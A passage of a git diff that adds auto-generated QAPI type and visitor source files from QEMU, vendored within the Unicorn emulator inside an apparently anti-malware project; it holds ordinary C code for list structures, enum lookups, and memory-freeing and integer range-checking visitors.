+ } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_ErrorClassList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPURegister32List(X86CPURegister32List *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPURegister32List(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPUFeatureWordInfoList(X86CPUFeatureWordInfoList *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPUFeatureWordInfoList(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + + +void qapi_free_X86CPUFeatureWordInfo(X86CPUFeatureWordInfo *obj) +{ + QapiDeallocVisitor *md; + Visitor *v; + + if (!obj) { + return; + } + + md = qapi_dealloc_visitor_new(); + v = qapi_dealloc_get_visitor(md); + visit_type_X86CPUFeatureWordInfo(v, &obj, NULL, NULL); + qapi_dealloc_visitor_cleanup(md); +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.h b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.h new file mode 100644 index 0000000..944e882 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-types.h @@ -0,0 +1,228 @@ +/* AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI types + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#ifndef QAPI_TYPES_H +#define QAPI_TYPES_H + +#include "unicorn/platform.h" + + +#ifndef QAPI_TYPES_BUILTIN_STRUCT_DECL_H +#define QAPI_TYPES_BUILTIN_STRUCT_DECL_H + + +typedef struct strList +{ + union { + char *value; + uint64_t padding; + }; + struct strList *next; +} strList; + +typedef struct intList +{ + union { + int64_t value; + uint64_t padding; + }; + struct intList *next; +} intList; + +typedef struct numberList +{ + union { + double value; + uint64_t padding; + }; + struct numberList *next; +} numberList; + +typedef struct boolList +{ + union { + bool value; + uint64_t padding; + }; + struct boolList *next; +} boolList; + +typedef struct int8List +{ + union { + int8_t value; + uint64_t padding; + }; + struct int8List *next; +} int8List; + +typedef struct int16List +{ + union { + int16_t value; + uint64_t padding; + }; + struct int16List *next; +} int16List; + +typedef struct int32List +{ + union { + int32_t value; + uint64_t padding; + }; + struct int32List *next; +} int32List; + +typedef struct int64List +{ + union { + int64_t value; + uint64_t padding; + }; + struct int64List *next; +} int64List; + +typedef struct uint8List +{ + union { + uint8_t value; + uint64_t padding; + }; + struct uint8List *next; +} uint8List; + +typedef struct uint16List +{ + union { + uint16_t value; + uint64_t padding; + }; + struct uint16List *next; +} uint16List; + +typedef struct uint32List +{ + union { + uint32_t value; + uint64_t padding; + }; + struct uint32List *next; +} uint32List; + +typedef struct uint64List +{ + union { + uint64_t value; + uint64_t padding; + }; + struct uint64List *next; +} uint64List; + +#endif /* QAPI_TYPES_BUILTIN_STRUCT_DECL_H */ + + +extern const char *ErrorClass_lookup[]; +typedef enum ErrorClass +{ + ERROR_CLASS_GENERIC_ERROR = 0, + ERROR_CLASS_COMMAND_NOT_FOUND = 1, + ERROR_CLASS_DEVICE_ENCRYPTED = 2, + ERROR_CLASS_DEVICE_NOT_ACTIVE = 3, + ERROR_CLASS_DEVICE_NOT_FOUND = 4, + ERROR_CLASS_KVM_MISSING_CAP = 5, + ERROR_CLASS_MAX = 
6, +} ErrorClass; + +typedef struct ErrorClassList +{ + union { + ErrorClass value; + uint64_t padding; + }; + struct ErrorClassList *next; +} ErrorClassList; + +extern const char *X86CPURegister32_lookup[]; +typedef enum X86CPURegister32 +{ + X86_CPU_REGISTER32_EAX = 0, + X86_CPU_REGISTER32_EBX = 1, + X86_CPU_REGISTER32_ECX = 2, + X86_CPU_REGISTER32_EDX = 3, + X86_CPU_REGISTER32_ESP = 4, + X86_CPU_REGISTER32_EBP = 5, + X86_CPU_REGISTER32_ESI = 6, + X86_CPU_REGISTER32_EDI = 7, + X86_CPU_REGISTER32_MAX = 8, +} X86CPURegister32; + +typedef struct X86CPURegister32List +{ + union { + X86CPURegister32 value; + uint64_t padding; + }; + struct X86CPURegister32List *next; +} X86CPURegister32List; + + +typedef struct X86CPUFeatureWordInfo X86CPUFeatureWordInfo; + +typedef struct X86CPUFeatureWordInfoList +{ + union { + X86CPUFeatureWordInfo *value; + uint64_t padding; + }; + struct X86CPUFeatureWordInfoList *next; +} X86CPUFeatureWordInfoList; + +#ifndef QAPI_TYPES_BUILTIN_CLEANUP_DECL_H +#define QAPI_TYPES_BUILTIN_CLEANUP_DECL_H + +void qapi_free_strList(strList *obj); +void qapi_free_intList(intList *obj); +void qapi_free_numberList(numberList *obj); +void qapi_free_boolList(boolList *obj); +void qapi_free_int8List(int8List *obj); +void qapi_free_int16List(int16List *obj); +void qapi_free_int32List(int32List *obj); +void qapi_free_int64List(int64List *obj); +void qapi_free_uint8List(uint8List *obj); +void qapi_free_uint16List(uint16List *obj); +void qapi_free_uint32List(uint32List *obj); +void qapi_free_uint64List(uint64List *obj); + +#endif /* QAPI_TYPES_BUILTIN_CLEANUP_DECL_H */ + + +void qapi_free_ErrorClassList(ErrorClassList *obj); + +void qapi_free_X86CPURegister32List(X86CPURegister32List *obj); + +struct X86CPUFeatureWordInfo +{ + int64_t cpuid_input_eax; + bool has_cpuid_input_ecx; + int64_t cpuid_input_ecx; + X86CPURegister32 cpuid_register; + int64_t features; +}; + +void qapi_free_X86CPUFeatureWordInfoList(X86CPUFeatureWordInfoList *obj); +void 
qapi_free_X86CPUFeatureWordInfo(X86CPUFeatureWordInfo *obj); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.c new file mode 100644 index 0000000..7733bb5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.c @@ -0,0 +1,428 @@ +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qemu-common.h" +#include "qapi-visit.h" + +void visit_type_strList(Visitor *m, strList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + strList *native_i = (strList *)i; + visit_type_str(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_intList(Visitor *m, intList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + intList *native_i = (intList *)i; + visit_type_int(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_numberList(Visitor *m, numberList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err 
&& (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + numberList *native_i = (numberList *)i; + visit_type_number(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_boolList(Visitor *m, boolList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + boolList *native_i = (boolList *)i; + visit_type_bool(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int8List(Visitor *m, int8List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int8List *native_i = (int8List *)i; + visit_type_int8(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int16List(Visitor *m, int16List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int16List *native_i = (int16List *)i; + visit_type_int16(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int32List(Visitor *m, int32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, 
name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int32List *native_i = (int32List *)i; + visit_type_int32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_int64List(Visitor *m, int64List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + int64List *native_i = (int64List *)i; + visit_type_int64(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint8List(Visitor *m, uint8List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint8List *native_i = (uint8List *)i; + visit_type_uint8(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint16List(Visitor *m, uint16List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint16List *native_i = (uint16List *)i; + visit_type_uint16(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint32List(Visitor *m, uint32List **obj, const 
char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint32List *native_i = (uint32List *)i; + visit_type_uint32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_uint64List(Visitor *m, uint64List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + uint64List *native_i = (uint64List *)i; + visit_type_uint64(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_ErrorClassList(Visitor *m, ErrorClassList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + ErrorClassList *native_i = (ErrorClassList *)i; + visit_type_ErrorClass(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_ErrorClass(Visitor *m, ErrorClass *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, ErrorClass_lookup, "ErrorClass", name, errp); +} + +void visit_type_X86CPURegister32List(Visitor *m, X86CPURegister32List **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = 
visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + X86CPURegister32List *native_i = (X86CPURegister32List *)i; + visit_type_X86CPURegister32(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} + +void visit_type_X86CPURegister32(Visitor *m, X86CPURegister32 *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, X86CPURegister32_lookup, "X86CPURegister32", name, errp); +} + +static void visit_type_X86CPUFeatureWordInfo_fields(Visitor *m, X86CPUFeatureWordInfo **obj, Error **errp) +{ + Error *err = NULL; + visit_type_int(m, &(*obj)->cpuid_input_eax, "cpuid-input-eax", &err); + if (err) { + goto out; + } + visit_optional(m, &(*obj)->has_cpuid_input_ecx, "cpuid-input-ecx", &err); + if (!err && (*obj)->has_cpuid_input_ecx) { + visit_type_int(m, &(*obj)->cpuid_input_ecx, "cpuid-input-ecx", &err); + } + if (err) { + goto out; + } + visit_type_X86CPURegister32(m, &(*obj)->cpuid_register, "cpuid-register", &err); + if (err) { + goto out; + } + visit_type_int(m, &(*obj)->features, "features", &err); + if (err) { + goto out; + } + +out: + error_propagate(errp, err); +} + +void visit_type_X86CPUFeatureWordInfo(Visitor *m, X86CPUFeatureWordInfo **obj, const char *name, Error **errp) +{ + Error *err = NULL; + + visit_start_struct(m, (void **)obj, "X86CPUFeatureWordInfo", name, sizeof(X86CPUFeatureWordInfo), &err); + if (!err) { + if (*obj) { + visit_type_X86CPUFeatureWordInfo_fields(m, obj, errp); + } + visit_end_struct(m, &err); + } + error_propagate(errp, err); +} + +void visit_type_X86CPUFeatureWordInfoList(Visitor *m, X86CPUFeatureWordInfoList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + X86CPUFeatureWordInfoList *native_i = 
(X86CPUFeatureWordInfoList *)i; + visit_type_X86CPUFeatureWordInfo(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.h b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.h new file mode 100644 index 0000000..51bd088 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi-visit.h @@ -0,0 +1,51 @@ +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef QAPI_VISIT_H +#define QAPI_VISIT_H + +#include "qapi/visitor.h" +#include "qapi-types.h" + + +#ifndef QAPI_VISIT_BUILTIN_VISITOR_DECL_H +#define QAPI_VISIT_BUILTIN_VISITOR_DECL_H + +void visit_type_strList(Visitor *m, strList **obj, const char *name, Error **errp); +void visit_type_intList(Visitor *m, intList **obj, const char *name, Error **errp); +void visit_type_numberList(Visitor *m, numberList **obj, const char *name, Error **errp); +void visit_type_boolList(Visitor *m, boolList **obj, const char *name, Error **errp); +void visit_type_int8List(Visitor *m, int8List **obj, const char *name, Error **errp); +void visit_type_int16List(Visitor *m, int16List **obj, const char *name, Error **errp); +void visit_type_int32List(Visitor *m, int32List **obj, const char *name, Error **errp); +void visit_type_int64List(Visitor *m, int64List **obj, const char *name, Error **errp); +void visit_type_uint8List(Visitor *m, uint8List **obj, const char *name, Error **errp); +void visit_type_uint16List(Visitor *m, uint16List **obj, const char *name, Error **errp); +void visit_type_uint32List(Visitor *m, uint32List **obj, const char *name, Error **errp); +void 
visit_type_uint64List(Visitor *m, uint64List **obj, const char *name, Error **errp); + +#endif /* QAPI_VISIT_BUILTIN_VISITOR_DECL_H */ + + +void visit_type_ErrorClass(Visitor *m, ErrorClass *obj, const char *name, Error **errp); +void visit_type_ErrorClassList(Visitor *m, ErrorClassList **obj, const char *name, Error **errp); + +void visit_type_X86CPURegister32(Visitor *m, X86CPURegister32 *obj, const char *name, Error **errp); +void visit_type_X86CPURegister32List(Visitor *m, X86CPURegister32List **obj, const char *name, Error **errp); + +void visit_type_X86CPUFeatureWordInfo(Visitor *m, X86CPUFeatureWordInfo **obj, const char *name, Error **errp); +void visit_type_X86CPUFeatureWordInfoList(Visitor *m, X86CPUFeatureWordInfoList **obj, const char *name, Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/Makefile.objs new file mode 100644 index 0000000..00e40d6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/Makefile.objs @@ -0,0 +1,3 @@ +util-obj-y = qapi-visit-core.o qapi-dealloc-visitor.o qmp-input-visitor.o +util-obj-y += qmp-output-visitor.o +util-obj-y += string-input-visitor.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-dealloc-visitor.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-dealloc-visitor.c new file mode 100644 index 0000000..a14a1c7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-dealloc-visitor.c @@ -0,0 +1,224 @@ +/* + * Dealloc Visitor + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Michael Roth + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#include "qapi/dealloc-visitor.h" +#include "qemu/queue.h" +#include "qemu-common.h" +#include "qapi/qmp/types.h" +#include "qapi/visitor-impl.h" + +typedef struct StackEntry +{ + void *value; + bool is_list_head; + QTAILQ_ENTRY(StackEntry) node; +} StackEntry; + +struct QapiDeallocVisitor +{ + Visitor visitor; + QTAILQ_HEAD(, StackEntry) stack; + bool is_list_head; +}; + +static QapiDeallocVisitor *to_qov(Visitor *v) +{ + return container_of(v, QapiDeallocVisitor, visitor); +} + +static void qapi_dealloc_push(QapiDeallocVisitor *qov, void *value) +{ + StackEntry *e = g_malloc0(sizeof(*e)); + + e->value = value; + + /* see if we're just pushing a list head tracker */ + if (value == NULL) { + e->is_list_head = true; + } + QTAILQ_INSERT_HEAD(&qov->stack, e, node); +} + +static void *qapi_dealloc_pop(QapiDeallocVisitor *qov) +{ + StackEntry *e = QTAILQ_FIRST(&qov->stack); + QObject *value; + QTAILQ_REMOVE(&qov->stack, e, node); + value = e->value; + g_free(e); + return value; +} + +static void qapi_dealloc_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t unused, + Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + qapi_dealloc_push(qov, obj); +} + +static void qapi_dealloc_end_struct(Visitor *v, Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + void **obj = qapi_dealloc_pop(qov); + if (obj) { + g_free(*obj); + } +} + +static void qapi_dealloc_start_implicit_struct(Visitor *v, + void **obj, + size_t size, + Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + qapi_dealloc_push(qov, obj); +} + +static void qapi_dealloc_end_implicit_struct(Visitor *v, Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + void **obj = qapi_dealloc_pop(qov); + if (obj) { + g_free(*obj); + } +} + +static void qapi_dealloc_start_list(Visitor *v, const char *name, Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + qapi_dealloc_push(qov, NULL); +} + +static GenericList *qapi_dealloc_next_list(Visitor *v, GenericList 
**listp, + Error **errp) +{ + GenericList *list = *listp; + QapiDeallocVisitor *qov = to_qov(v); + StackEntry *e = QTAILQ_FIRST(&qov->stack); + + if (e && e->is_list_head) { + e->is_list_head = false; + return list; + } + + if (list) { + list = list->next; + g_free(*listp); + return list; + } + + return NULL; +} + +static void qapi_dealloc_end_list(Visitor *v, Error **errp) +{ + QapiDeallocVisitor *qov = to_qov(v); + void *obj = qapi_dealloc_pop(qov); + assert(obj == NULL); /* should've been list head tracker with no payload */ +} + +static void qapi_dealloc_type_str(Visitor *v, char **obj, const char *name, + Error **errp) +{ + if (obj) { + g_free(*obj); + } +} + +static void qapi_dealloc_type_int(Visitor *v, int64_t *obj, const char *name, + Error **errp) +{ +} + +static void qapi_dealloc_type_bool(Visitor *v, bool *obj, const char *name, + Error **errp) +{ +} + +static void qapi_dealloc_type_number(Visitor *v, double *obj, const char *name, + Error **errp) +{ +} + +static void qapi_dealloc_type_size(Visitor *v, uint64_t *obj, const char *name, + Error **errp) +{ +} + +static void qapi_dealloc_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, + Error **errp) +{ +} + +/* If there's no data present, the dealloc visitor has nothing to free. + * Thus, indicate to visitor code that the subsequent union fields can + * be skipped. This is not an error condition, since the cleanup of the + * rest of an object can continue unhindered, so leave errp unset in + * these cases. + * + * NOTE: In cases where we're attempting to deallocate an object that + * may have missing fields, the field indicating the union type may + * be missing. In such a case, it's possible we don't have enough + * information to differentiate data_present == false from a case where + * data *is* present but happens to be a scalar with a value of 0. 
+ * This is okay, since in the case of the dealloc visitor there's no + * work that needs to done in either situation. + * + * The current inability in QAPI code to more thoroughly verify a union + * type in such cases will likely need to be addressed if we wish to + * implement this interface for other types of visitors in the future, + * however. + */ +static bool qapi_dealloc_start_union(Visitor *v, bool data_present, + Error **errp) +{ + return data_present; +} + +Visitor *qapi_dealloc_get_visitor(QapiDeallocVisitor *v) +{ + return &v->visitor; +} + +void qapi_dealloc_visitor_cleanup(QapiDeallocVisitor *v) +{ + g_free(v); +} + +QapiDeallocVisitor *qapi_dealloc_visitor_new(void) +{ + QapiDeallocVisitor *v; + + v = g_malloc0(sizeof(*v)); + + v->visitor.start_struct = qapi_dealloc_start_struct; + v->visitor.end_struct = qapi_dealloc_end_struct; + v->visitor.start_implicit_struct = qapi_dealloc_start_implicit_struct; + v->visitor.end_implicit_struct = qapi_dealloc_end_implicit_struct; + v->visitor.start_list = qapi_dealloc_start_list; + v->visitor.next_list = qapi_dealloc_next_list; + v->visitor.end_list = qapi_dealloc_end_list; + v->visitor.type_enum = qapi_dealloc_type_enum; + v->visitor.type_int = qapi_dealloc_type_int; + v->visitor.type_bool = qapi_dealloc_type_bool; + v->visitor.type_str = qapi_dealloc_type_str; + v->visitor.type_number = qapi_dealloc_type_number; + v->visitor.type_size = qapi_dealloc_type_size; + v->visitor.start_union = qapi_dealloc_start_union; + + QTAILQ_INIT(&v->stack); + + return v; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-visit-core.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-visit-core.c new file mode 100644 index 0000000..5f91840 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qapi/qapi-visit-core.c @@ -0,0 +1,313 @@ +/* + * Core Definitions for QAPI Visitor Classes + * + * Copyright IBM, Corp. 
2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qemu-common.h" +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qerror.h" +#include "qapi/visitor.h" +#include "qapi/visitor-impl.h" + +void visit_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t size, Error **errp) +{ + v->start_struct(v, obj, kind, name, size, errp); +} + +void visit_end_struct(Visitor *v, Error **errp) +{ + v->end_struct(v, errp); +} + +void visit_start_implicit_struct(Visitor *v, void **obj, size_t size, + Error **errp) +{ + if (v->start_implicit_struct) { + v->start_implicit_struct(v, obj, size, errp); + } +} + +void visit_end_implicit_struct(Visitor *v, Error **errp) +{ + if (v->end_implicit_struct) { + v->end_implicit_struct(v, errp); + } +} + +void visit_start_list(Visitor *v, const char *name, Error **errp) +{ + v->start_list(v, name, errp); +} + +GenericList *visit_next_list(Visitor *v, GenericList **list, Error **errp) +{ + return v->next_list(v, list, errp); +} + +void visit_end_list(Visitor *v, Error **errp) +{ + v->end_list(v, errp); +} + +bool visit_start_union(Visitor *v, bool data_present, Error **errp) +{ + if (v->start_union) { + return v->start_union(v, data_present, errp); + } + return true; +} + +void visit_end_union(Visitor *v, bool data_present, Error **errp) +{ + if (v->end_union) { + v->end_union(v, data_present, errp); + } +} + +void visit_optional(Visitor *v, bool *present, const char *name, + Error **errp) +{ + if (v->optional) { + v->optional(v, present, name, errp); + } +} + +void visit_get_next_type(Visitor *v, int *obj, const int *qtypes, + const char *name, Error **errp) +{ + if (v->get_next_type) { + v->get_next_type(v, obj, qtypes, name, errp); + } +} + +void visit_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp) +{ + 
v->type_enum(v, obj, strings, kind, name, errp); +} + +void visit_type_int(Visitor *v, int64_t *obj, const char *name, Error **errp) +{ + v->type_int(v, obj, name, errp); +} + +void visit_type_uint8(Visitor *v, uint8_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_uint8) { + v->type_uint8(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < 0 || value > UINT8_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "uint8_t"); + return; + } + *obj = (uint8_t)value; + } +} + +void visit_type_uint16(Visitor *v, uint16_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_uint16) { + v->type_uint16(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < 0 || value > UINT16_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "uint16_t"); + return; + } + *obj = (uint16_t)value; + } +} + +void visit_type_uint32(Visitor *v, uint32_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_uint32) { + v->type_uint32(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < 0 || value > UINT32_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "uint32_t"); + return; + } + *obj = (uint32_t)value; + } +} + +void visit_type_uint64(Visitor *v, uint64_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_uint64) { + v->type_uint64(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + *obj = value; + } +} + +void visit_type_int8(Visitor *v, int8_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_int8) { + v->type_int8(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < INT8_MIN || value > INT8_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? 
name : "null", + "int8_t"); + return; + } + *obj = (int8_t)value; + } +} + +void visit_type_int16(Visitor *v, int16_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_int16) { + v->type_int16(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < INT16_MIN || value > INT16_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "int16_t"); + return; + } + *obj = (int16_t)value; + } +} + +void visit_type_int32(Visitor *v, int32_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_int32) { + v->type_int32(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + if (value < INT32_MIN || value > INT32_MAX) { + error_set(errp, QERR_INVALID_PARAMETER_VALUE, name ? name : "null", + "int32_t"); + return; + } + *obj = (int32_t)value; + } +} + +void visit_type_int64(Visitor *v, int64_t *obj, const char *name, Error **errp) +{ + if (v->type_int64) { + v->type_int64(v, obj, name, errp); + } else { + v->type_int(v, obj, name, errp); + } +} + +void visit_type_size(Visitor *v, uint64_t *obj, const char *name, Error **errp) +{ + int64_t value; + + if (v->type_size) { + v->type_size(v, obj, name, errp); + } else if (v->type_uint64) { + v->type_uint64(v, obj, name, errp); + } else { + value = *obj; + v->type_int(v, &value, name, errp); + *obj = value; + } +} + +void visit_type_bool(Visitor *v, bool *obj, const char *name, Error **errp) +{ + v->type_bool(v, obj, name, errp); +} + +void visit_type_str(Visitor *v, char **obj, const char *name, Error **errp) +{ + v->type_str(v, obj, name, errp); +} + +void visit_type_number(Visitor *v, double *obj, const char *name, Error **errp) +{ + 